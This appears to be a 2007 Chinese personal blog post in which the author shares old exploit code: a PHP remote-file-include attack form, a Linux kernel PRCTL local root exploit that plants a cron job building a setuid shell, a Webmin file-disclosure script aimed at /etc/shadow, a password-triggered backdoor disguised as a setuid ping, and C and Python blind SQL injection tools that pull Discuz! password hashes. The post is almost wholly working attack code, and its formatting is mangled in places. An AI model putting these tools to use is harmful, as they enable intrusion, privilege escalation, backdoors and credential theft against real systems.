GaRY's Blog

Beginning is always beautiful

小东西

翻找以前的东西.找到以前写的一些小东西,自己都不记得了....
呵呵,丢上来,都是些没有技术含量的玩意

Remote Include File 的exp,利用的是php://input,所以要求对方php起码要有4.3.0版本以上:
<?php
/*
*
* PHP include file exploit 
* Modified by wofeiwo <wofeiwo[0x40]gmail[0x2e]com>
* Date: Jun 24th 2006
*
*/

function stripslashes_array(&$array) {
 
while (list($key,$var= each($array)) {
  
if ($key != 'argc' && $key != 'argv' && (strtoupper($key!= $key || ''.intval($key== "$key")) {
   
if (is_string($var)) {
    
$array[$key= stripslashes($var);
   }
   
if (is_array($var))  {
    
$array[$key= stripslashes_array($var);
   }
  }
 }
 
return $array;
}

if (get_magic_quotes_gpc()) {
    
$_GET = stripslashes_array($_GET);
    
$_POST = stripslashes_array($_POST);
}

$server=isset($_POST['server'])?$_POST['server']:"";
$file=isset($_POST['file'])?$_POST['file']:"";
$iszero=isset($_POST['iszero'])?"checked":"";
$cmd=isset($_POST['cmd'])?$_POST['cmd']:"";
?>

<style>
body {font
-family : sans-serif;background-color: #ffffff; color: #000000;}
b {font-family : Courier New, sans-serif;font-size : 24px;}
.center {text-align: center;}
input {
        font
-family: "Verdana";
        font
-size: "10px";
        BACKGROUND
-COLOR: "#FFFFFF";
        height
: "18px";
        border
: "2px solid #666666";
}
</style>

<center><b>PHP include file exploit</b><br><font size="2px">Notice: this exploit cannot be used while target is below PHP 4.3.0</font></center><br><br>
<form action="" method="post" >
target server 
: <br>
<input type="text" name="server" value="<?=$server?>"><br><br>
target 
file (including URI parameter used in include() call ex:"index.php?includeParam=":<br>
<input type="text" name="file" value="<?=$file?>"><br>
add 
"%00": <input type="checkbox" <?=$iszero?> name="iszero"><br><br>
exec (enclose php commands between &lt;? .. ?&gt; tags):<br> 
<input type="text" name="cmd" value="<?= htmlspecialchars($cmd);?>" ><br><br>
<INPUT type="submit" value="send">
</form>

<?php
if(isset($_POST['cmd']))
{
$zerochar = $iszero == "checked"?"%00":"";
$message  = "POST /".$file."php://input".$zerochar." HTTP/1.1\r\n";
$message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$message .= "Accept-Language: fr\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "Accept-Encoding: deflate\r\n";
$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2)\r\n";
$message .= "Host: ".$server."\r\n";
$message .= "Content-length: ".strlen($cmd)."\r\n";
$message .= "Connection: Keep-Alive\r\n";
$message .= "Cache-Control: no-cache\r\n";
$message .= "\r\n";
$message .= $cmd."\r\n";
$fd = fsockopen$server, 80 );
fputs($fd,$message);
$resp = "<pre>";
while(!feof($fd)) {
$resp .= fread($fd,1024);
}
fclose($fd);
$resp .="</pre>";
echo $resp;
}
?>


这个是当时linux kernel PRCTL loacl poc,刚出来的时候我换了个shellcode,后来这个exp出了4个版本,各个都比我的好:)
/********************************************************/
/* Local r00t Exploit for:                              */
/* Linux Kernel PRCTL Core Dump Handling                */
/* Modified by wofeiwo [13.Jul.2006] (chage shellcode)  */
/*------------------------------------------------------*/
/* Based on:                                            */
/*------------------------------------------------------*/
/* By:                                                  */
/* - dreyer    <luna@aditel.org>   (main PoC code)      */
/* - RoMaNSoFt <roman@rs-labs.com> (local root code)    */
/*                                  [ 10.Jul.2006 ]     */
/********************************************************/

#include <stdio.h>
#
include <sys/time.h>
#
include <sys/resource.h>
#
include <unistd.h>
#
include <linux/prctl.h>
#
include <stdlib.h>
#
include <sys/types.h>
#
include <signal.h>

char 
*payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * *   root   echo -e \"#include <stdio.h>\\nint main(){\\nsetuid(0);setgid(0);setreuid(0);system(\\\"/bin/sh\\\");return 0;\\n}\\n\" > /tmp/fakesh.c;gcc -o /tmp/fakesh /tmp/fakesh.c;chmod +s /tmp/fakesh;rm -f /tmp/fakesh.c;/tmp/fakesh;rm -f /etc/cron.d/core\n";

int main() { 
    int child;
    struct rlimit corelimit;
    
printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n");
    
printf("By: dreyer & RoMaNSoFt\n");
    
printf("Last modified By: wofeiwo (chage shellcode)\n");
    
printf("Last edited: [ 13.Jul.2006 ]\n\n");

    corelimit
.rlim_cur = RLIM_INFINITY;
    corelimit
.rlim_max = RLIM_INFINITY;
    setrlimit(RLIMIT_CORE
, &corelimit);

    
printf("[*] Creating Cron entry\n");

    
if ( !( child = fork() )) {
        
chdir("/etc/cron.d");
        prctl(PR_SET_DUMPABLE
, 2);
        
sleep(200);
        
exit(1);
    }

    kill(child
, SIGSEGV);

    
printf("[*] Sleeping for aprox. one minute (** please wait **)\n");
    
sleep(63);

    
printf("[*] Running shell (remember to remove /tmp/fakesh when finished) \n");
    
system("/tmp/fakesh");
    
return 0;
}

python写的,去年webmin 一个高危漏洞的exp
#!/usr/bin/python
#
 Webmin - Usermin Arbitrary File Disclosure Exploit
#
 Write by wofeiwo
#
 Date: July 10 2006

import sys, urllib, os

def usage (name):
    
print "Webmin - Usermin Arbitrary File Disclosure Exploit\nWrite by wofeiwo <wofeiwo[0x40]gmail[dot]com>\n\nUsage: %s <target> <file>\nExamples: %s http://localhost:10000/ /etc/shadow\n" % (name, name)
    
def main ():
    
if len(sys.argv) != 3
        (filepath, filename) 
= os.path.split(sys.argv[0])
        usage(filename)
        sys.exit(
-1)
    
else:
        target 
= sys.argv[1+ "unauthenticated" + "/..%01"*61 + "/" + sys.argv[2]
        sock 
= urllib.urlopen(target)
        getfile 
= sock.read()
        sock.close()
        
print getfile

if __name__ == "__main__": main()

n年前写的替换系统ping的后门,因为ping是有s位的:)
#include <stdio.h>
#
include <unistd.h> 
#
include <signal.h> 
#
include <sys/param.h> 
#
include <sys/types.h> 
#
include <sys/stat.h>
#
include <unistd.h> 
#
include <fcntl.h> 
#
include <errno.h>

#define PWD "wofeiwo"

/* init the daemon, if success return 0 other <0 */ 
int daemon_init() 

    struct sigaction act; 
    int i
, maxfd; 

    
if(fork() != 0exit(0); 
    
if(setsid() < 0return(-1); 

    act
.sa_handler = SIG_IGN; 
    
/*act.sa_mask = 0;*/ 
    act
.sa_flags = 0

    sigaction(SIGHUP
, &act, 0); 

    
if(fork() != 0exit(0); 

    
chdir("/"); 
    
umask(0); 
    maxfd 
= sysconf(_SC_OPEN_MAX); 
    
for(i=0; i<maxfd; i++
    close(i); 
    open(
"/dev/null", O_RDWR); 
    dup(
0); 
    dup(
1); 
    dup(
2); 
    
return(0); 


int main(int argc
, char *argv[])
{
    int i
,j=0;
    char argv_execv[
52][128];
    char usage[]
=
    
"Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]\n"
        
"            [-p pattern] [-s packetsize] [-t ttl] [-I interface or address]\n"
        
"            [-M mtu discovery hint] [-S sndbuf]\n"
        
"            [ -T timestamp option ] [ -Q tos ] [hop1 ] destination\n";

    
if (argc == 1printf("%s", usage);
    
if (argc > 1)
    {
        
if (strcmp(PWD, argv[1]) == 0)
        {
            signal(SIGCHLD
, sig_chid);
            daemon_init();
            seteuid(
0);
            setuid(
0);
            setgid(
0);
            
system("/bin/bash");
            
return 1;
        }
        
else
        {
            
for (i = argc; i > 0; i--
            {
                strcpy(argv_execv[j]
,argv[j]);
                j
++;
            }
            strcpy(argv_execv[j]
, "\0");
            execv(
"/bin/ping", argv);
            
return 1;
        }
    }
    
return 0;
}


最后两个,都是dz5rc1的exp,一个c语言单线程,一个py的多线程,都是练手写的
/*
*
* Discuz! 5.0.0 RC1 SQL injection PoC
* Author: wofeiwo thx superheis help
* Date: Aug 24th 2006
*
*/

#include <stdio.h>
#
include <stdlib.h>
#
include <winsock2.h>
#
include <windows.h>

#pragma comment (lib,"ws2_32")

#define PASSLEN 32


char 
*HMod[] =            { "GET","POST"};
char 
*HttpVer[] =        { "HTTP/1.0", "HTTP/1.1"};
char 
*HAccept[] =        { "Accept:"," image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*"};
char 
*HAcceptLg[] =        { "Accept-Language:"," zh-cn"};
char 
*HContentTp[]=        { "Content-Type:"," application/x-www-form-urlencoded"};
char 
*HAcceptEn[] =        { "Accept-Encoding:"," gzip, deflate"};
char 
*HUserAgent[]=        { "User-Agent:"," Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon)"};
char 
*HReferer[]=        { "REFERER:"," http://127.0.0.1/dz/logging.php?action=login"};
char 
*HHost[]=            { "Host: "};
char 
*HContentLg[]=      { "Content-Length:"," 189"};
char 
*HContion[]=        { "Connection:"," Keep-Alive"};
char 
*HCacheCtr[]=        { "Cache-Control:"," no-cache"};
char 
*HXForwardedFor[]=    { "X-Forwarded-For:"};
char 
*HCookie[]=        { "Cookie:"," cdb_sid=70KRjS; cdb_cookietime=2592000"};
char 
*HPost[]=            { "formhash=6a49b97f&referer=discuz.php&loginmode=&styleid=&cookietime=2592000&loginfield=username&username=heige&password=123456789&questionid=0&answer=&loginsubmit=%E6%8F%90+%C2%A0+%E4%BA%A4" };

char query[] 
= " ' union select 122,122,122,122,122,122,122,122 from cdb_members where uid=%s AND ascii(substring(CONCAT(password),%d,1))=%d /*";
char querystring[
128];

char temp1[
1024],temp2[10240= {0};
    

int sanddata(char 
*host, int port, char *path, char *uid, int ascii, int chrnum)
{
    WSADATA  WSAData
={0};
    struct hostent 
*he;
    struct sockaddr_in  ServerAddr
={0};
    SOCKET Socket
=0;
    int ren 
= 0;
    char 
*= NULL;
    
    
if(WSAStartup(MAKEWORD(2,2), &WSAData)) return 1;

    
if((he = gethostbyname(host)) == 0)
    {
        
fprintf(stderr, "\r\n[-] Failed resolving %s\r\n", host);
        
exit(-1);
    }

    Socket 
= socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);

    
    ServerAddr
.sin_family = AF_INET;
    ServerAddr
.sin_addr = *((struct in_addr *)he->h_addr);
    ServerAddr
.sin_port = htons(port);

    memset(temp1
,0,1024);
    
sprintf(querystring, query, uid, chrnum, ascii);
    
sprintf(temp1,    "%s %s%s %s\r\n"
                    
"%s%s\r\n"
                    
"%s%s\r\n"
                    
"%s%s\r\n"
                    
"%s%s\r\n"
                    
"%s%s\r\n"
                    
"%s%s\r\n"
                    
"%s%s\r\n"
                    
"%s%s\r\n"
                    
"%s%s\r\n"
                    
"%s%s\r\n"
                    
"%s%s\r\n"
                    
"%s%s\r\n"
                    
"\r\n"
                    
"%s\r\n"
                    
"\r\n\r\n"
                    
,
                    HMod[
1],path,"logging.php?action=login",HttpVer[1],
                    HAccept[
0],HAccept[1],
                    HAcceptLg[
0],HAcceptLg[1],
                    HContentTp[
0],HContentTp[1],
                    HAcceptEn[
0],HAcceptEn[1],
                    HUserAgent[
0],HUserAgent[1],
                    HReferer[
0],HReferer[1],
                    HHost[
0],host,
                    HContentLg[
0]," 0",
                    HContion[
0],HContion[1],
                    HCacheCtr[
0],HCacheCtr[1],
                    HXForwardedFor[
0],querystring,
                    HCookie[
0],HCookie[1],
                    HPost[
0]
                    );
    
if (chrnum == 1printf("\r\n%s\r\n",temp1);

    connect(Socket
,(SOCKADDR *)&ServerAddr,sizeof(ServerAddr));

    send(Socket
,temp1,strlen(temp1),0);
    
//sleep(1);
    while((ren = recv(Socket,temp2+strlen(temp2),10240-strlen(temp2),0))<=0){;}

    
if (chrnum == 1printf("\r\n%s\r\n",temp2);
    
if(chrnum == 1 && (p = strstr(temp2, "SELECT")) == NULL && (p = strstr(temp2, "array_merge")) == NULL)
    {
        
fprintf(stderr, "\r\n[-] Unvulnerable host\r\n");
        
exit(1);
    }
    
if((p = strstr(temp2, "ip3")) == NULL)
    {
        close(Socket);
        
return ascii;
    }
            
    close(Socket);
    
return 0;
}

int main(int argc
,char *argv[])
{
    int i 
= 0,= 0,ret = 0;

    
fprintf(stdout, "Discuz! 5.0.0 RC1 SQL injection exploit\r\n");
    
fprintf(stdout, "Codz by wofeiwo wofeiwo[0x40]gmail[0x2C]com\r\n\r\n");

    
if(argc != 5)
    {
        
fprintf(stderr, "Usage: %s <host> <port> <path> <uid>\r\n", argv[0]);
        
fprintf(stderr, "Example: %s localhost 80 /dz/ 1\r\n", argv[0]);
        
exit(1);
    }

    
fprintf(stdout, "[+] Connect %s\r\n", argv[1]);
    
fprintf(stdout, "[+] Trying ..\r\n");
    
fprintf(stdout, "[+] Plz wait a monment ..\r\n");
    
fprintf(stdout, "[+] The uid = %s password hash is: ", argv[4]);

    
for(j = 1; j <= PASSLEN; j++)
    {
        
for(i = 48; i < 58; i++)
        {
            
if(ret == 0) ret = sanddata(argv[1], atoi(argv[2]), argv[3], argv[4], i, j);
            
else
            {
                
fprintf(stdout, "%c", ret);
                goto finded;
            }
        }
        
for(i = 98; i < 123; i++)
        {
            
if(ret == 0) ret = sanddata(argv[1], atoi(argv[2]), argv[3], argv[4], i, j);
            
else 
            {
                
fprintf(stdout, "%c", ret);
                goto finded;
            }
        }
        finded
: ret = 0;
    }

    
fprintf(stdout, "\r\n");
    
fprintf(stdout, "[+] Finished\r\n");

    
return 0;
}

#!/usr/bin/python
#
 Discuz! 5.0.0 RC1 SQL injection exploit (MultiThread Version)
#
 Author: wofeiwo
#
 Date: Aug 13th 2006

import sys 
import httplib
import threading
from urlparse import urlparse
from time import sleep

password 
= {1:'',2:'',3:'',4:'',5:'',6:'',7:'',8:'',9:'',10:'',11:'',12:'',13:'',14:'',15:'',16:'',17:'',18:'',19:'',20:'',21:'',22:'',23:'',24:'',25:'',26:'',27:'',28:'',29:'',30:'',31:'',32:''}

class creatthread (threading.Thread):
    
def __init__ (self, threadname, url, u):
        self.realurl 
= url
        self.realu 
= u
        threading.Thread.
__init__(self, name = threadname)
        
    
def run (self):
        lenth 
= 32
        injection(lenth, self.realurl, self.realu, self.getName())        
    
def  injection (lenthofpass, realurl, path, num):
        
        ran 
= range(97123)
        
for a in range(4858): ran.append(a)

        
for i in ran:
    
            query 
= '\' union select 122,122,122,122,122,122,122,122 from cdb_members where uid=' + sys.argv[2] + ' AND ascii(substring(CONCAT(password),' + num + ',1))=' + str(i) + ' /*'
            header = {'Accept':'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*','Referer':'http://' + realurl[1+ path + 'logging.php?action=login','Accept-Language':'zh-cn','Content-Type':'application/x-www-form-urlencoded','User-Agent':'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon)','Connection':'Keep-Alive','Cache-Control':'no-cache','X-Forwarded-For':query,'Cookie':'cdb_sid=70KRjS; cdb_cookietime=2592000'}
            data 
= "formhash=6a49b97f&referer=discuz.php&loginmode=&styleid=&cookietime=2592000&loginfield=username&username=test&password=123456789&questionid=0&answer=&loginsubmit=%E6%8F%90+%C2%A0+%E4%BA%A4"
            
#print header
            #sys.exit(1)
            http = httplib.HTTPConnection(realurl[1])
            http.request(
"POST", path + "logging.php?action=login&",data , header)
            sleep(
1)
            response 
= http.getresponse()
            re1 
= response.read()
            
if re1.find('SELECT'== -1:
                
print '[-] Unvalnerable host'
                
print '[-] Exit..'
                sys.exit(
1);
    
            
elif re1.find('ip3'== -1:
                password[int(num)] 
= chr(i)
                
#print '[+] password ' + num + ': ' + chr(i)
                http.close()
                sleep(
1)
                
break
            
#print re1
            #print '-----------------------------------------------'
            http.close()
            sleep(
1)

def main ():
    
print 'Discuz! 5.0.0 RC1 SQL injection exploit (MultiThread Version)'
    
print 'Codz by wofeiwo wofeiwo[0x40]gmail[0x2C]com\n'

    
if len(sys.argv) == 3:
        url 
= urlparse(sys.argv[1])
        
if url[2:-1!= '/':
            u 
= url[2+ '/'
        
else
            u 
= url[2]
    
else:
        
print "Usage: %s <url> <uid>" % sys.argv[0]
        
print "Example: %s http://127.0.0.1/dz/ 1" % sys.argv[0]
        sys.exit(0)

    
print '[+] Connect %s' % url[1]
    
print '[+] Begin threads'
    
print '[+] Plz wait a long long time'
    
    
for a in range(1,33) :
        thread 
= creatthread(str(a), url, u)
        thread.start()
    
    
while threading.activeCount() != 1
        
continue
    
else:
        sys.stdout.write( 
'[+] The uid=' + sys.argv[2+ ' password hash is: ' )
        
for n in range(133) :
            sys.stdout.write(password[n])
        sys.stdout.write(
'\n[+] Finished \n')
        

if __name__ == '__main__': main()

posted on 2007-05-22 16:12 wofeiwo 阅读(629) 评论(0)  编辑 收藏 引用 网摘 所属分类: TipsOthers


只有注册用户登录后才能发表评论。
网站导航:

导航

<2007年5月>
293012345
6789101112
13141516171819
20212223242526
272829303112
3456789

统计

留言簿(10)

随笔分类(90)

随笔档案(61)

搜索

最新随笔

最新评论